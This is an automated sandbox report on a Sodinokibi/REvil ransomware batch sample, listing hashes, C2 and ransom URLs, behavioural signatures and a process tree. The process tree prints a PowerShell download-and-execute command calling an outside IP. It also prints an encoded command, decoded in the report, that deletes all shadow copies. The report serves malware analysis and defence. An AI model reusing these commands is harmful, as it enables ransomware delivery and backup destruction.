Analysis

- max time kernel: 139s
- max time network: 55s
- platform: windows7_x64
- resource: win7v200430
- submitted: 09-07-2020 08:10
Tasks

- Static task: static1
- Behavioral task: behavioral1
  - Sample: 8f9ff3aa474fa163cb2753cdce6a9abc.bat
  - Resource: win7v200430
- Behavioral task: behavioral2
  - Sample: 8f9ff3aa474fa163cb2753cdce6a9abc.bat
  - Resource: win10
General

- Target: 8f9ff3aa474fa163cb2753cdce6a9abc.bat
- Size: 214B
- MD5: 6583fe9275827519cd2bad15c56e349c
- SHA1: 134d9f2a3be2ede4777cd9216538f582570c21e5
- SHA256: 65aca88b78d41c561c3ab4b732484deb7ba50a7a3b9499406faf938ee12085b8
- SHA512: c96021e32ec898f32c0de82016c899052d36358d1e57512c4b4b0875e1507a7862b5837cb4e5e98b2a5726a059a1593749b0839fac788db9c70bfcdd07dea48b
Malware Config

Extracted:
- http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc

Extracted:
- C:\70f99a3q4-readme.txt
- sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7C7E8AD28D2AAA5B
- http://decryptor.cc/7C7E8AD28D2AAA5B
Signatures

- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes: cmd.exe, powershell.exe

| description | pid | process | target process |
|---|---|---|---|
| PID 1032 wrote to memory of 364 | 1032 | cmd.exe | powershell.exe |
| PID 1032 wrote to memory of 364 | 1032 | cmd.exe | powershell.exe |
| PID 1032 wrote to memory of 364 | 1032 | cmd.exe | powershell.exe |
| PID 1032 wrote to memory of 364 | 1032 | cmd.exe | powershell.exe |
| PID 364 wrote to memory of 1712 | 364 | powershell.exe | powershell.exe |
| PID 364 wrote to memory of 1712 | 364 | powershell.exe | powershell.exe |
| PID 364 wrote to memory of 1712 | 364 | powershell.exe | powershell.exe |
| PID 364 wrote to memory of 1712 | 364 | powershell.exe | powershell.exe |
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe

| description | pid | process |
|---|---|---|
| Token: SeDebugPrivilege | 364 | powershell.exe |
| Token: SeDebugPrivilege | 364 | powershell.exe |
| Token: SeDebugPrivilege | 1712 | powershell.exe |
| Token: SeBackupPrivilege | 1612 | vssvc.exe |
| Token: SeRestorePrivilege | 1612 | vssvc.exe |
| Token: SeAuditPrivilege | 1612 | vssvc.exe |
| Token: SeTakeOwnershipPrivilege | 364 | powershell.exe |
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe, powershell.exe

| pid | process |
|---|---|
| 364 | powershell.exe |
| 364 | powershell.exe |
| 364 | powershell.exe |
| 1712 | powershell.exe |
| 1712 | powershell.exe |
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe

| flow | pid | process |
|---|---|---|
| 3 | 364 | powershell.exe |
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe

| description | ioc | process |
|---|---|---|
| Set value (str) | `\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ql78br.bmp"` | powershell.exe |
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe

| pid | process |
|---|---|
| 364 | powershell.exe |
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe

| description | ioc | process |
|---|---|---|
| Key created | `\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer` | vssvc.exe |
| Key created | `\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer` | vssvc.exe |
| Key created | `\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer` | vssvc.exe |
| Key created | `\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer` | vssvc.exe |
- Drops file in Program Files directory (34 IoCs)
  Processes: powershell.exe

| description | ioc | process |
|---|---|---|
| File created | `\??\c:\program files\microsoft sql server compact edition\70f99a3q4-readme.txt` | powershell.exe |
| File opened for modification | `\??\c:\program files\PublishTest.shtml` | powershell.exe |
| File opened for modification | `\??\c:\program files\RenameSwitch.ram` | powershell.exe |
| File opened for modification | `\??\c:\program files\UnblockLock.xlt` | powershell.exe |
| File created | `\??\c:\program files\microsoft sql server compact edition\v3.5\70f99a3q4-readme.txt` | powershell.exe |
| File opened for modification | `\??\c:\program files\GetEnable.temp` | powershell.exe |
| File opened for modification | `\??\c:\program files\PingComplete.xlsb` | powershell.exe |
| File opened for modification | `\??\c:\program files\ResolveDisconnect.js` | powershell.exe |
| File opened for modification | `\??\c:\program files\RestoreGroup.raw` | powershell.exe |
| File opened for modification | `\??\c:\program files\ResumeProtect.doc` | powershell.exe |
| File opened for modification | `\??\c:\program files\ApprovePublish.mpeg3` | powershell.exe |
| File opened for modification | `\??\c:\program files\LimitUninstall.vbs` | powershell.exe |
| File opened for modification | `\??\c:\program files\SendMount.xls` | powershell.exe |
| File opened for modification | `\??\c:\program files\UpdateEnter.rle` | powershell.exe |
| File opened for modification | `\??\c:\program files\SaveConvertFrom.au3` | powershell.exe |
| File opened for modification | `\??\c:\program files\TracePublish.gif` | powershell.exe |
| File created | `\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\70f99a3q4-readme.txt` | powershell.exe |
| File created | `\??\c:\program files\70f99a3q4-readme.txt` | powershell.exe |
| File opened for modification | `\??\c:\program files\AddUpdate.wav` | powershell.exe |
| File opened for modification | `\??\c:\program files\NewAdd.vsdx` | powershell.exe |
| File opened for modification | `\??\c:\program files\ShowConvertTo.zip` | powershell.exe |
| File created | `\??\c:\program files (x86)\70f99a3q4-readme.txt` | powershell.exe |
| File opened for modification | `\??\c:\program files\ConvertFromJoin.doc` | powershell.exe |
| File opened for modification | `\??\c:\program files\ConvertRequest.midi` | powershell.exe |
| File opened for modification | `\??\c:\program files\DebugRename.xps` | powershell.exe |
| File opened for modification | `\??\c:\program files\ExportProtect.ppsm` | powershell.exe |
| File opened for modification | `\??\c:\program files\OptimizeStart.mid` | powershell.exe |
| File opened for modification | `\??\c:\program files\InitializeInvoke.wvx` | powershell.exe |
| File opened for modification | `\??\c:\program files\RevokePop.3gpp` | powershell.exe |
| File opened for modification | `\??\c:\program files\StartPublish.dotm` | powershell.exe |
| File opened for modification | `\??\c:\program files\StepShow.ppt` | powershell.exe |
| File opened for modification | `\??\c:\program files\UnprotectUnblock.vssx` | powershell.exe |
| File opened for modification | `\??\c:\program files\ConnectLimit.wma` | powershell.exe |
| File opened for modification | `\??\c:\program files\RevokeShow.clr` | powershell.exe |
Processes

- Depth 1: C:\Windows\system32\cmd.exe
  Command line: `cmd /c "C:\Users\Admin\AppData\Local\Temp\8f9ff3aa474fa163cb2753cdce6a9abc.bat"`
  PID: 1032
  - Suspicious use of WriteProcessMemory
  - Depth 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc');Invoke-QAYURDA;Start-Sleep -s 10000"`
    PID: 364
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Drops file in Program Files directory
    - Depth 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: `powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==`
      (The `-e` argument is UTF-16LE base64; it decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, which deletes all Volume Shadow Copies and accounts for the vssvc.exe activity and the SeBackupPrivilege/SeRestorePrivilege token use recorded above.)
      PID: 1712
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- Depth 1: C:\Windows\system32\vssvc.exe
  Command line: `C:\Windows\system32\vssvc.exe`
  PID: 1612
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service